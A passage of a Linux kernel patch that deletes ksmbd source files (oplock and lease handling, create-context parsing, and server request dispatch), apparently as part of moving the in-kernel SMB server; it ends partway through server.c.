+- * smb_break_all_oplock() - break both batch/exclusive and level2 oplock
+- * @work:	smb work
+- * @fp:		ksmbd file pointer
+- */
+-void smb_break_all_oplock(struct ksmbd_work *work, struct ksmbd_file *fp)
+-{
+-	if (!test_share_config_flag(work->tcon->share_conf,
+-				    KSMBD_SHARE_FLAG_OPLOCKS))
+-		return;
+-
+-	smb_break_all_write_oplock(work, fp, 1);
+-	smb_break_all_levII_oplock(work, fp, 1);
+-}
+-
+-/**
+- * smb2_map_lease_to_oplock() - map lease state to corresponding oplock type
+- * @lease_state:     lease type
+- *
+- * Return:      0 if no mapping, otherwise corresponding oplock type
+- */
+-__u8 smb2_map_lease_to_oplock(__le32 lease_state)
+-{
+-	if (lease_state == (SMB2_LEASE_HANDLE_CACHING_LE |
+-			    SMB2_LEASE_READ_CACHING_LE |
+-			    SMB2_LEASE_WRITE_CACHING_LE)) {
+-		return SMB2_OPLOCK_LEVEL_BATCH;
+-	} else if (lease_state != SMB2_LEASE_WRITE_CACHING_LE &&
+-		 lease_state & SMB2_LEASE_WRITE_CACHING_LE) {
+-		if (!(lease_state & SMB2_LEASE_HANDLE_CACHING_LE))
+-			return SMB2_OPLOCK_LEVEL_EXCLUSIVE;
+-	} else if (lease_state & SMB2_LEASE_READ_CACHING_LE) {
+-		return SMB2_OPLOCK_LEVEL_II;
+-	}
+-	return 0;
+-}
+-
+-/**
+- * create_lease_buf() - create lease context for open cmd response
+- * @rbuf:	buffer to create lease context response
+- * @lease:	buffer storing the parsed lease state information
+- */
+-void create_lease_buf(u8 *rbuf, struct lease *lease)
+-{
+-	if (lease->version == 2) {
+-		struct create_lease_v2 *buf = (struct create_lease_v2 *)rbuf;
+-
+-		memset(buf, 0, sizeof(struct create_lease_v2));
+-		memcpy(buf->lcontext.LeaseKey, lease->lease_key,
+-		       SMB2_LEASE_KEY_SIZE);
+-		buf->lcontext.LeaseFlags = lease->flags;
+-		buf->lcontext.LeaseState = lease->state;
+-		memcpy(buf->lcontext.ParentLeaseKey, lease->parent_lease_key,
+-		       SMB2_LEASE_KEY_SIZE);
+-		buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-				(struct create_lease_v2, lcontext));
+-		buf->ccontext.DataLength = cpu_to_le32(sizeof(struct lease_context_v2));
+-		buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-				(struct create_lease_v2, Name));
+-		buf->ccontext.NameLength = cpu_to_le16(4);
+-		buf->Name[0] = 'R';
+-		buf->Name[1] = 'q';
+-		buf->Name[2] = 'L';
+-		buf->Name[3] = 's';
+-	} else {
+-		struct create_lease *buf = (struct create_lease *)rbuf;
+-
+-		memset(buf, 0, sizeof(struct create_lease));
+-		memcpy(buf->lcontext.LeaseKey, lease->lease_key, SMB2_LEASE_KEY_SIZE);
+-		buf->lcontext.LeaseFlags = lease->flags;
+-		buf->lcontext.LeaseState = lease->state;
+-		buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-				(struct create_lease, lcontext));
+-		buf->ccontext.DataLength = cpu_to_le32(sizeof(struct lease_context));
+-		buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-				(struct create_lease, Name));
+-		buf->ccontext.NameLength = cpu_to_le16(4);
+-		buf->Name[0] = 'R';
+-		buf->Name[1] = 'q';
+-		buf->Name[2] = 'L';
+-		buf->Name[3] = 's';
+-	}
+-}
+-
+-/**
+- * parse_lease_state() - parse lease context contained in file open request
+- * @open_req:	buffer containing smb2 file open(create) request
+- *
+- * Return:  allocated lease context on success, NULL if not found or on failure
+- */
+-struct lease_ctx_info *parse_lease_state(void *open_req)
+-{
+-	struct create_context *cc;
+-	struct smb2_create_req *req = (struct smb2_create_req *)open_req;
+-	struct lease_ctx_info *lreq;
+-
+-	cc = smb2_find_context_vals(req, SMB2_CREATE_REQUEST_LEASE, 4);
+-	if (IS_ERR_OR_NULL(cc))
+-		return NULL;
+-
+-	lreq = kzalloc(sizeof(struct lease_ctx_info), GFP_KERNEL);
+-	if (!lreq)
+-		return NULL;
+-
+-	if (sizeof(struct lease_context_v2) == le32_to_cpu(cc->DataLength)) {
+-		struct create_lease_v2 *lc = (struct create_lease_v2 *)cc;
+-
+-		memcpy(lreq->lease_key, lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
+-		lreq->req_state = lc->lcontext.LeaseState;
+-		lreq->flags = lc->lcontext.LeaseFlags;
+-		lreq->duration = lc->lcontext.LeaseDuration;
+-		memcpy(lreq->parent_lease_key, lc->lcontext.ParentLeaseKey,
+-				SMB2_LEASE_KEY_SIZE);
+-		lreq->version = 2;
+-	} else {
+-		struct create_lease *lc = (struct create_lease *)cc;
+-
+-		memcpy(lreq->lease_key, lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
+-		lreq->req_state = lc->lcontext.LeaseState;
+-		lreq->flags = lc->lcontext.LeaseFlags;
+-		lreq->duration = lc->lcontext.LeaseDuration;
+-		lreq->version = 1;
+-	}
+-	return lreq;
+-}
+-
+-/**
+- * smb2_find_context_vals() - find a particular context info in open request
+- * @open_req:	buffer containing smb2 file open(create) request
+- * @tag:	context name to search for
+- * @tag_len:	the length of tag
+- *
+- * Return:	pointer to requested context, NULL if @tag context not found
+- *		or error pointer if name length is invalid.
+- */
+-struct create_context *smb2_find_context_vals(void *open_req, const char *tag, int tag_len)
+-{
+-	struct create_context *cc;
+-	unsigned int next = 0;
+-	char *name;
+-	struct smb2_create_req *req = (struct smb2_create_req *)open_req;
+-	unsigned int remain_len, name_off, name_len, value_off, value_len,
+-		     cc_len;
+-
+-	/*
+-	 * CreateContextsOffset and CreateContextsLength are guaranteed to
+-	 * be valid because of ksmbd_smb2_check_message().
+-	 */
+-	cc = (struct create_context *)((char *)req +
+-				       le32_to_cpu(req->CreateContextsOffset));
+-	remain_len = le32_to_cpu(req->CreateContextsLength);
+-	do {
+-		cc = (struct create_context *)((char *)cc + next);
+-		if (remain_len < offsetof(struct create_context, Buffer))
+-			return ERR_PTR(-EINVAL);
+-
+-		next = le32_to_cpu(cc->Next);
+-		name_off = le16_to_cpu(cc->NameOffset);
+-		name_len = le16_to_cpu(cc->NameLength);
+-		value_off = le16_to_cpu(cc->DataOffset);
+-		value_len = le32_to_cpu(cc->DataLength);
+-		cc_len = next ? next : remain_len;
+-
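+-		/*
+-		 * Contexts are 8-byte aligned; the name must immediately
+-		 * follow the fixed header, and both name and value must lie
+-		 * within this context.
+-		 */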
+-		if ((next & 0x7) != 0 ||
+-		    next > remain_len ||
+-		    name_off != offsetof(struct create_context, Buffer) ||
+-		    name_len < 4 ||
+-		    name_off + name_len > cc_len ||
+-		    (value_off & 0x7) != 0 ||
+-		    (value_off && (value_off < name_off + name_len)) ||
+-		    ((u64)value_off + value_len > cc_len))
+-			return ERR_PTR(-EINVAL);
+-
+-		name = (char *)cc + name_off;
+-		if (name_len == tag_len && !memcmp(name, tag, name_len))
+-			return cc;
+-
+-		remain_len -= next;
+-	} while (next != 0);
+-
+-	return NULL;
+-}
+-
+-/**
+- * create_durable_rsp_buf() - create durable handle context
+- * @cc:	buffer to create durable context response
+- */
+-void create_durable_rsp_buf(char *cc)
+-{
+-	struct create_durable_rsp *buf;
+-
+-	buf = (struct create_durable_rsp *)cc;
+-	memset(buf, 0, sizeof(struct create_durable_rsp));
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-			(struct create_durable_rsp, Data));
+-	buf->ccontext.DataLength = cpu_to_le32(8);
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-			(struct create_durable_rsp, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_DURABLE_HANDLE_RESPONSE is "DHnQ" */
+-	buf->Name[0] = 'D';
+-	buf->Name[1] = 'H';
+-	buf->Name[2] = 'n';
+-	buf->Name[3] = 'Q';
+-}
+-
+-/**
+- * create_durable_v2_rsp_buf() - create durable handle v2 context
+- * @cc:	buffer to create durable context response
+- * @fp: ksmbd file pointer
+- */
+-void create_durable_v2_rsp_buf(char *cc, struct ksmbd_file *fp)
+-{
+-	struct create_durable_v2_rsp *buf;
+-
+-	buf = (struct create_durable_v2_rsp *)cc;
+-	memset(buf, 0, sizeof(struct create_durable_rsp));
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-			(struct create_durable_rsp, Data));
+-	buf->ccontext.DataLength = cpu_to_le32(8);
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-			(struct create_durable_rsp, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_DURABLE_HANDLE_RESPONSE_V2 is "DH2Q" */
+-	buf->Name[0] = 'D';
+-	buf->Name[1] = 'H';
+-	buf->Name[2] = '2';
+-	buf->Name[3] = 'Q';
+-
+-	buf->Timeout = cpu_to_le32(fp->durable_timeout);
+-}
+-
+-/**
+- * create_mxac_rsp_buf() - create query maximal access context
+- * @cc:			buffer to create maximal access context response
+- * @maximal_access:	maximal access
+- */
+-void create_mxac_rsp_buf(char *cc, int maximal_access)
+-{
+-	struct create_mxac_rsp *buf;
+-
+-	buf = (struct create_mxac_rsp *)cc;
+-	memset(buf, 0, sizeof(struct create_mxac_rsp));
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-			(struct create_mxac_rsp, QueryStatus));
+-	buf->ccontext.DataLength = cpu_to_le32(8);
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-			(struct create_mxac_rsp, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_QUERY_MAXIMAL_ACCESS_RESPONSE is "MxAc" */
+-	buf->Name[0] = 'M';
+-	buf->Name[1] = 'x';
+-	buf->Name[2] = 'A';
+-	buf->Name[3] = 'c';
+-
+-	buf->QueryStatus = STATUS_SUCCESS;
+-	buf->MaximalAccess = cpu_to_le32(maximal_access);
+-}
+-
+-void create_disk_id_rsp_buf(char *cc, __u64 file_id, __u64 vol_id)
+-{
+-	struct create_disk_id_rsp *buf;
+-
+-	buf = (struct create_disk_id_rsp *)cc;
+-	memset(buf, 0, sizeof(struct create_disk_id_rsp));
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-			(struct create_disk_id_rsp, DiskFileId));
+-	buf->ccontext.DataLength = cpu_to_le32(32);
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-			(struct create_mxac_rsp, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_QUERY_ON_DISK_ID_RESPONSE is "QFid" */
+-	buf->Name[0] = 'Q';
+-	buf->Name[1] = 'F';
+-	buf->Name[2] = 'i';
+-	buf->Name[3] = 'd';
+-
+-	buf->DiskFileId = cpu_to_le64(file_id);
+-	buf->VolumeId = cpu_to_le64(vol_id);
+-}
+-
+-/**
+- * create_posix_rsp_buf() - create posix extension context
+- * @cc:	buffer to create the posix context response
+- * @fp: ksmbd file pointer
+- */
+-void create_posix_rsp_buf(char *cc, struct ksmbd_file *fp)
+-{
+-	struct create_posix_rsp *buf;
+-	struct inode *inode = file_inode(fp->filp);
+-	struct user_namespace *user_ns = file_mnt_user_ns(fp->filp);
+-	vfsuid_t vfsuid = i_uid_into_vfsuid(user_ns, inode);
+-	vfsgid_t vfsgid = i_gid_into_vfsgid(user_ns, inode);
+-
+-	buf = (struct create_posix_rsp *)cc;
+-	memset(buf, 0, sizeof(struct create_posix_rsp));
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-			(struct create_posix_rsp, nlink));
+-	/*
+-	 * DataLength = nlink(4) + reparse_tag(4) + mode(4) +
+-	 * domain sid(28) + unix group sid(16).
+-	 */
+-	buf->ccontext.DataLength = cpu_to_le32(56);
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-			(struct create_posix_rsp, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(POSIX_CTXT_DATA_LEN);
+-	/* SMB2_CREATE_TAG_POSIX is "0x93AD25509CB411E7B42383DE968BCD7C" */
+-	buf->Name[0] = 0x93;
+-	buf->Name[1] = 0xAD;
+-	buf->Name[2] = 0x25;
+-	buf->Name[3] = 0x50;
+-	buf->Name[4] = 0x9C;
+-	buf->Name[5] = 0xB4;
+-	buf->Name[6] = 0x11;
+-	buf->Name[7] = 0xE7;
+-	buf->Name[8] = 0xB4;
+-	buf->Name[9] = 0x23;
+-	buf->Name[10] = 0x83;
+-	buf->Name[11] = 0xDE;
+-	buf->Name[12] = 0x96;
+-	buf->Name[13] = 0x8B;
+-	buf->Name[14] = 0xCD;
+-	buf->Name[15] = 0x7C;
+-
+-	buf->nlink = cpu_to_le32(inode->i_nlink);
+-	buf->reparse_tag = cpu_to_le32(fp->volatile_id);
+-	buf->mode = cpu_to_le32(inode->i_mode & 0777);
+-	/*
+-	 * SidBuffer(44) contain two sids(Domain sid(28), UNIX group sid(16)).
+-	 * Domain sid(28) = revision(1) + num_subauth(1) + authority(6) +
+-	 *		    sub_auth(4 * 4(num_subauth)) + RID(4).
+-	 * UNIX group id(16) = revision(1) + num_subauth(1) + authority(6) +
+-	 *		       sub_auth(4 * 1(num_subauth)) + RID(4).
+-	 */
+-	id_to_sid(from_kuid_munged(&init_user_ns, vfsuid_into_kuid(vfsuid)),
+-		  SIDOWNER, (struct smb_sid *)&buf->SidBuffer[0]);
+-	id_to_sid(from_kgid_munged(&init_user_ns, vfsgid_into_kgid(vfsgid)),
+-		  SIDUNIX_GROUP, (struct smb_sid *)&buf->SidBuffer[28]);
+-}
+-
+-/**
+- * lookup_lease_in_table() - find a matching lease object (opinfo) for a
+- *		given lease key/fid from the lease break/file close path
+- * @conn:	connection instance
+- * @lease_key:	lease key to be searched for
+- *
+- * Return:      the matching opinfo if found, otherwise NULL
+- */
+-struct oplock_info *lookup_lease_in_table(struct ksmbd_conn *conn,
+-					  char *lease_key)
+-{
+-	struct oplock_info *opinfo = NULL, *ret_op = NULL;
+-	struct lease_table *lt;
+-	int ret;
+-
+-	read_lock(&lease_list_lock);
+-	list_for_each_entry(lt, &lease_table_list, l_entry) {
+-		if (!memcmp(lt->client_guid, conn->ClientGUID,
+-			    SMB2_CLIENT_GUID_SIZE))
+-			goto found;
+-	}
+-
+-	read_unlock(&lease_list_lock);
+-	return NULL;
+-
+-found:
+-	rcu_read_lock();
+-	list_for_each_entry_rcu(opinfo, &lt->lease_list, lease_entry) {
+-		if (!atomic_inc_not_zero(&opinfo->refcount))
+-			continue;
+-		rcu_read_unlock();
+-		if (!opinfo->op_state || opinfo->op_state == OPLOCK_CLOSING)
+-			goto op_next;
+-		if (!(opinfo->o_lease->state &
+-		      (SMB2_LEASE_HANDLE_CACHING_LE |
+-		       SMB2_LEASE_WRITE_CACHING_LE)))
+-			goto op_next;
+-		ret = compare_guid_key(opinfo, conn->ClientGUID,
+-				       lease_key);
+-		if (ret) {
+-			ksmbd_debug(OPLOCK, "found opinfo\n");
+-			ret_op = opinfo;
+-			goto out;
+-		}
+-op_next:
+-		opinfo_put(opinfo);
+-		rcu_read_lock();
+-	}
+-	rcu_read_unlock();
+-
+-out:
+-	read_unlock(&lease_list_lock);
+-	return ret_op;
+-}
+diff --git a/fs/ksmbd/oplock.h b/fs/ksmbd/oplock.h
+deleted file mode 100644
+index 4b0fe6da76940..0000000000000
+--- a/fs/ksmbd/oplock.h
++++ /dev/null
+@@ -1,127 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __KSMBD_OPLOCK_H
+-#define __KSMBD_OPLOCK_H
+-
+-#include "smb_common.h"
+-
+-#define OPLOCK_WAIT_TIME	(35 * HZ)
+-
+-/* SMB2 Oplock levels */
+-#define SMB2_OPLOCK_LEVEL_NONE          0x00
+-#define SMB2_OPLOCK_LEVEL_II            0x01
+-#define SMB2_OPLOCK_LEVEL_EXCLUSIVE     0x08
+-#define SMB2_OPLOCK_LEVEL_BATCH         0x09
+-#define SMB2_OPLOCK_LEVEL_LEASE         0xFF
+-
+-/* Oplock states */
+-#define OPLOCK_STATE_NONE	0x00
+-#define OPLOCK_ACK_WAIT		0x01
+-#define OPLOCK_CLOSING		0x02
+-
+-#define OPLOCK_WRITE_TO_READ		0x01
+-#define OPLOCK_READ_HANDLE_TO_READ	0x02
+-#define OPLOCK_WRITE_TO_NONE		0x04
+-#define OPLOCK_READ_TO_NONE		0x08
+-
+-struct lease_ctx_info {
+-	__u8			lease_key[SMB2_LEASE_KEY_SIZE];
+-	__le32			req_state;
+-	__le32			flags;
+-	__le64			duration;
+-	__u8			parent_lease_key[SMB2_LEASE_KEY_SIZE];
+-	int			version;
+-};
+-
+-struct lease_table {
+-	char			client_guid[SMB2_CLIENT_GUID_SIZE];
+-	struct list_head	lease_list;
+-	struct list_head	l_entry;
+-	spinlock_t		lb_lock;
+-};
+-
+-struct lease {
+-	__u8			lease_key[SMB2_LEASE_KEY_SIZE];
+-	__le32			state;
+-	__le32			new_state;
+-	__le32			flags;
+-	__le64			duration;
+-	__u8			parent_lease_key[SMB2_LEASE_KEY_SIZE];
+-	int			version;
+-	unsigned short		epoch;
+-	struct lease_table	*l_lb;
+-};
+-
+-struct oplock_info {
+-	struct ksmbd_conn	*conn;
+-	struct ksmbd_session	*sess;
+-	struct ksmbd_work	*work;
+-	struct ksmbd_file	*o_fp;
+-	int                     level;
+-	int                     op_state;
+-	unsigned long		pending_break;
+-	u64			fid;
+-	atomic_t		breaking_cnt;
+-	atomic_t		refcount;
+-	__u16                   Tid;
+-	bool			is_lease;
+-	bool			open_trunc;	/* truncate on open */
+-	struct lease		*o_lease;
+-	struct list_head        interim_list;
+-	struct list_head        op_entry;
+-	struct list_head        lease_entry;
+-	wait_queue_head_t oplock_q; /* Other server threads */
+-	wait_queue_head_t oplock_brk; /* oplock breaking wait */
+-	struct rcu_head		rcu_head;
+-};
+-
+-struct lease_break_info {
+-	__le32			curr_state;
+-	__le32			new_state;
+-	__le16			epoch;
+-	char			lease_key[SMB2_LEASE_KEY_SIZE];
+-};
+-
+-struct oplock_break_info {
+-	int level;
+-	int open_trunc;
+-	int fid;
+-};
+-
+-int smb_grant_oplock(struct ksmbd_work *work, int req_op_level,
+-		     u64 pid, struct ksmbd_file *fp, __u16 tid,
+-		     struct lease_ctx_info *lctx, int share_ret);
+-void smb_break_all_levII_oplock(struct ksmbd_work *work,
+-				struct ksmbd_file *fp, int is_trunc);
+-int opinfo_write_to_read(struct oplock_info *opinfo);
+-int opinfo_read_handle_to_read(struct oplock_info *opinfo);
+-int opinfo_write_to_none(struct oplock_info *opinfo);
+-int opinfo_read_to_none(struct oplock_info *opinfo);
+-void close_id_del_oplock(struct ksmbd_file *fp);
+-void smb_break_all_oplock(struct ksmbd_work *work, struct ksmbd_file *fp);
+-struct oplock_info *opinfo_get(struct ksmbd_file *fp);
+-void opinfo_put(struct oplock_info *opinfo);
+-
+-/* Lease related functions */
+-void create_lease_buf(u8 *rbuf, struct lease *lease);
+-struct lease_ctx_info *parse_lease_state(void *open_req);
+-__u8 smb2_map_lease_to_oplock(__le32 lease_state);
+-int lease_read_to_write(struct oplock_info *opinfo);
+-
+-/* Durable related functions */
+-void create_durable_rsp_buf(char *cc);
+-void create_durable_v2_rsp_buf(char *cc, struct ksmbd_file *fp);
+-void create_mxac_rsp_buf(char *cc, int maximal_access);
+-void create_disk_id_rsp_buf(char *cc, __u64 file_id, __u64 vol_id);
+-void create_posix_rsp_buf(char *cc, struct ksmbd_file *fp);
+-struct create_context *smb2_find_context_vals(void *open_req, const char *tag, int tag_len);
+-struct oplock_info *lookup_lease_in_table(struct ksmbd_conn *conn,
+-					  char *lease_key);
+-int find_same_lease_key(struct ksmbd_session *sess, struct ksmbd_inode *ci,
+-			struct lease_ctx_info *lctx);
+-void destroy_lease_table(struct ksmbd_conn *conn);
+-#endif /* __KSMBD_OPLOCK_H */
+diff --git a/fs/ksmbd/server.c b/fs/ksmbd/server.c
+deleted file mode 100644
+index 8a0ad399f2456..0000000000000
+--- a/fs/ksmbd/server.c
++++ /dev/null
+@@ -1,639 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include "glob.h"
+-#include "oplock.h"
+-#include "misc.h"
+-#include <linux/sched/signal.h>
+-#include <linux/workqueue.h>
+-#include <linux/sysfs.h>
+-#include <linux/module.h>
+-#include <linux/moduleparam.h>
+-
+-#include "server.h"
+-#include "smb_common.h"
+-#include "smbstatus.h"
+-#include "connection.h"
+-#include "transport_ipc.h"
+-#include "mgmt/user_session.h"
+-#include "crypto_ctx.h"
+-#include "auth.h"
+-
+-int ksmbd_debug_types;
+-
+-struct ksmbd_server_config server_conf;
+-
+-enum SERVER_CTRL_TYPE {
+-	SERVER_CTRL_TYPE_INIT,
+-	SERVER_CTRL_TYPE_RESET,
+-};
+-
+-struct server_ctrl_struct {
+-	int			type;
+-	struct work_struct	ctrl_work;
+-};
+-
+-static DEFINE_MUTEX(ctrl_lock);
+-
+-static int ___server_conf_set(int idx, char *val)
+-{
+-	if (idx >= ARRAY_SIZE(server_conf.conf))
+-		return -EINVAL;
+-
+-	if (!val || val[0] == 0x00)
+-		return -EINVAL;
+-
+-	kfree(server_conf.conf[idx]);
+-	server_conf.conf[idx] = kstrdup(val, GFP_KERNEL);
+-	if (!server_conf.conf[idx])
+-		return -ENOMEM;
+-	return 0;
+-}
+-
+-int ksmbd_set_netbios_name(char *v)
+-{
+-	return ___server_conf_set(SERVER_CONF_NETBIOS_NAME, v);
+-}
+-
+-int ksmbd_set_server_string(char *v)
+-{
+-	return ___server_conf_set(SERVER_CONF_SERVER_STRING, v);
+-}
+-
+-int ksmbd_set_work_group(char *v)
+-{
+-	return ___server_conf_set(SERVER_CONF_WORK_GROUP, v);
+-}
+-
+-char *ksmbd_netbios_name(void)
+-{
+-	return server_conf.conf[SERVER_CONF_NETBIOS_NAME];
+-}
+-
+-char *ksmbd_server_string(void)
+-{
+-	return server_conf.conf[SERVER_CONF_SERVER_STRING];
+-}
+-
+-char *ksmbd_work_group(void)
+-{
+-	return server_conf.conf[SERVER_CONF_WORK_GROUP];
+-}
+-
+-/**
+- * check_conn_state() - check state of server thread connection
+- * @work:     smb work containing server thread information
+- *
+- * Return:	0 on valid connection, otherwise 1 to reconnect
+- */
+-static inline int check_conn_state(struct ksmbd_work *work)
+-{
+-	struct smb_hdr *rsp_hdr;
+-
+-	if (ksmbd_conn_exiting(work->conn) ||
+-	    ksmbd_conn_need_reconnect(work->conn)) {
+-		rsp_hdr = work->response_buf;
+-		rsp_hdr->Status.CifsError = STATUS_CONNECTION_DISCONNECTED;
+-		return 1;
+-	}
+-	return 0;
+-}
+-
+-#define SERVER_HANDLER_CONTINUE		0
+-#define SERVER_HANDLER_ABORT		1
+-
+-static int __process_request(struct ksmbd_work *work, struct ksmbd_conn *conn,
+-			     u16 *cmd)
+-{
+-	struct smb_version_cmds *cmds;
+-	u16 command;
+-	int ret;
+-
+-	if (check_conn_state(work))
+-		return SERVER_HANDLER_CONTINUE;
+-
+-	if (ksmbd_verify_smb_message(work))
+-		return SERVER_HANDLER_ABORT;
+-
+-	command = conn->ops->get_cmd_val(work);
+-	*cmd = command;
+-
+-andx_again:
+-	if (command >= conn->max_cmds) {
+-		conn->ops->set_rsp_status(work, STATUS_INVALID_PARAMETER);
+-		return SERVER_HANDLER_CONTINUE;
+-	}
+-
+-	cmds = &conn->cmds[command];
+-	if (!cmds->proc) {
+-		ksmbd_debug(SMB, "*** not implemented yet cmd = %x\n", command);
+-		conn->ops->set_rsp_status(work, STATUS_NOT_IMPLEMENTED);
+-		return SERVER_HANDLER_CONTINUE;
+-	}
+-
+-	if (work->sess && conn->ops->is_sign_req(work, command)) {
+-		ret = conn->ops->check_sign_req(work);
+-		if (!ret) {
+-			conn->ops->set_rsp_status(work, STATUS_ACCESS_DENIED);
+-			return SERVER_HANDLER_CONTINUE;
+-		}
+-	}
+-
+-	ret = cmds->proc(work);
+-
+-	if (ret < 0)
+-		ksmbd_debug(CONN, "Failed to process %u [%d]\n", command, ret);
+-	/* AndX commands - chained request can return positive values */
+-	else if (ret > 0) {
+-		command = ret;
+-		*cmd = command;
+-		goto andx_again;
+-	}
+-
+-	if (work->send_no_response)
+-		return SERVER_HANDLER_ABORT;
+-	return SERVER_HANDLER_CONTINUE;
+-}
+-
+-static void __handle_ksmbd_work(struct ksmbd_work *work,
+-				struct ksmbd_conn *conn)
+-{
+-	u16 command = 0;
+-	int rc;
+-
+-	if (conn->ops->allocate_rsp_buf(work))
+-		return;
+-
+-	if (conn->ops->is_transform_hdr &&
+-	    conn->ops->is_transform_hdr(work->request_buf)) {
+-		rc = conn->ops->decrypt_req(work);
+-		if (rc < 0) {
+-			conn->ops->set_rsp_status(work, STATUS_DATA_ERROR);
+-			goto send;
+-		}
+-
+-		work->encrypted = true;
+-	}
+-
+-	rc = conn->ops->init_rsp_hdr(work);
+-	if (rc) {
+-		/* either uid or tid is not correct */
+-		conn->ops->set_rsp_status(work, STATUS_INVALID_HANDLE);
+-		goto send;
+-	}
+-
+-	if (conn->ops->check_user_session) {
+-		rc = conn->ops->check_user_session(work);
+-		if (rc < 0) {
+-			command = conn->ops->get_cmd_val(work);
+-			conn->ops->set_rsp_status(work,
+-					STATUS_USER_SESSION_DELETED);
+-			goto send;
+-		} else if (rc > 0) {
+-			rc = conn->ops->get_ksmbd_tcon(work);
+-			if (rc < 0) {
+-				conn->ops->set_rsp_status(work,
+-					STATUS_NETWORK_NAME_DELETED);
+-				goto send;
+-			}
+-		}
+-	}
+-
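+-	/*
+-	 * Compound (chained) requests are processed one PDU at a time
+-	 * until is_chained_smb2_message() finds no further command.
+-	 */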
+-	do {
+-		rc = __process_request(work, conn, &command);
+-		if (rc == SERVER_HANDLER_ABORT)
+-			break;
+-
+-		/*
+-		 * Call smb2_set_rsp_credits() function to set number of credits
+-		 * granted in hdr of smb2 response.
+-		 */
+-		if (conn->ops->set_rsp_credits) {
+-			spin_lock(&conn->credits_lock);
+-			rc = conn->ops->set_rsp_credits(work);
+-			spin_unlock(&conn->credits_lock);
+-			if (rc < 0) {
+-				conn->ops->set_rsp_status(work,
+-					STATUS_INVALID_PARAMETER);
+-				goto send;
+-			}
+-		}
+-
+-		if (work->sess &&
+-		    (work->sess->sign || smb3_11_final_sess_setup_resp(work) ||
+-		     conn->ops->is_sign_req(work, command)))
+-			conn->ops->set_sign_rsp(work);
+-	} while (is_chained_smb2_message(work));
+-
+-	if (work->send_no_response)
+-		return;
+-
+-send:
+-	smb3_preauth_hash_rsp(work);
+-	if (work->sess && work->sess->enc && work->encrypted &&
+-	    conn->ops->encrypt_resp) {
+-		rc = conn->ops->encrypt_resp(work);
+-		if (rc < 0)
+-			conn->ops->set_rsp_status(work, STATUS_DATA_ERROR);
+-	}
+-
+-	ksmbd_conn_write(work);
+-}
+-
+-/**
+- * handle_ksmbd_work() - process pending smb work requests
+- * @wk:	smb work containing request command buffer
+- *
+- * Called by kworker threads to process remaining smb work requests.
+- */
+-static void handle_ksmbd_work(struct work_struct *wk)
+-{
+-	struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);
+-	struct ksmbd_conn *conn = work->conn;
+-
+-	atomic64_inc(&conn->stats.request_served);
+-
+-	__handle_ksmbd_work(work, conn);
+-
+-	ksmbd_conn_try_dequeue_request(work);
+-	ksmbd_free_work_struct(work);
+-	/*
+-	 * Check the waitqueue to drop pending requests on
+-	 * disconnection. waitqueue_active() is safe because it
+-	 * uses an atomic operation for the condition.
+-	 */
+-	if (!atomic_dec_return(&conn->r_count) && waitqueue_active(&conn->r_count_q))
+-		wake_up(&conn->r_count_q);
+-}
+-
+-/**
+- * queue_ksmbd_work() - queue an smb request to the worker thread queue
+- *		for processing the smb command and sending the response
+- * @conn:	connection instance
+- *
+- * Read remaining data from the socket, then create and submit the work.
+- */
+-static int queue_ksmbd_work(struct ksmbd_conn *conn)
+-{
+-	struct ksmbd_work *work;
+-
+-	work = ksmbd_alloc_work_struct();
+-	if (!work) {
+-		pr_err("allocation for work failed\n");
+-		return -ENOMEM;
+-	}
+-
+-	work->conn = conn;
+-	work->request_buf = conn->request_buf;
+-	conn->request_buf = NULL;
+-
+-	ksmbd_init_smb_server(work);
+-
+-	ksmbd_conn_enqueue_request(work);
+-	atomic_inc(&conn->r_count);
+-	/* update activity on connection */
+-	conn->last_active = jiffies;
+-	INIT_WORK(&work->work, handle_ksmbd_work);
+-	ksmbd_queue_work(work);
+-	return 0;
+-}
+-
+-static int ksmbd_server_process_request(struct ksmbd_conn *conn)
+-{
+-	return queue_ksmbd_work(conn);
+-}
+-
+-static int ksmbd_server_terminate_conn(struct ksmbd_conn *conn)
+-{
+-	ksmbd_sessions_deregister(conn);
+-	destroy_lease_table(conn);
+-	return 0;
+-}
+-
+-static void ksmbd_server_tcp_callbacks_init(void)
+-{
+-	struct ksmbd_conn_ops ops;
+-
+-	ops.process_fn = ksmbd_server_process_request;
+-	ops.terminate_fn = ksmbd_server_terminate_conn;
+-
+-	ksmbd_conn_init_server_callbacks(&ops);
+-}
+-
+-static void server_conf_free(void)
+-{
+-	int i;
+-
+-	for (i = 0; i < ARRAY_SIZE(server_conf.conf); i++) {
+-		kfree(server_conf.conf[i]);
+-		server_conf.conf[i] = NULL;
+-	}
+-}
+-
+-static int server_conf_init(void)
+-{
+-	WRITE_ONCE(server_conf.state, SERVER_STATE_STARTING_UP);
+-	server_conf.enforced_signing = 0;
